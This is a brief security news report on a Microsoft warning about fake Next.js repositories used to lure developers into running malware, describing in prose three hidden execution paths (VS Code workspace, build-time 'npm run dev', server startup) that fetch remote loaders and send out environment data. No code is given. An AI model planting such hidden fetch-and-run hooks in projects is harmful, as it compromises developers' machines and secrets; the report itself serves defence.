MICROSOFT warns developers about fake Next[.]js repositories that deliver in‑memory malware, disguised as legitimate projects and assessments to gain persistent access. According to Microsoft Defender Security Research Team, the campaign uses multiple entry points on trusted platforms, with attacker‑controlled JavaScript retrieved at runtime and executed to facilitate command‑and‑control. The repositories often appear on Bitbucket under names such as “Cryptan-Platform-MVP1” to lure developers into running them as part of an assessment.
Three execution paths have been identified: Visual Studio Code workspace execution that fetches malicious code from a Vercel domain; build‑time execution triggered when developers run npm run dev, loading a JavaScript loader from Vercel; and server startup execution where a backend module executes hidden loader logic and exfiltrates environment data for in‑memory code execution.
While Microsoft stops short of attributing a specific actor, the method aligns with North Korea‑linked groups behind Contagious Interview, according to the report. GitLab noted that 131 unique accounts distributing malicious projects were banned, highlighting the broader ecosystem risks developers face.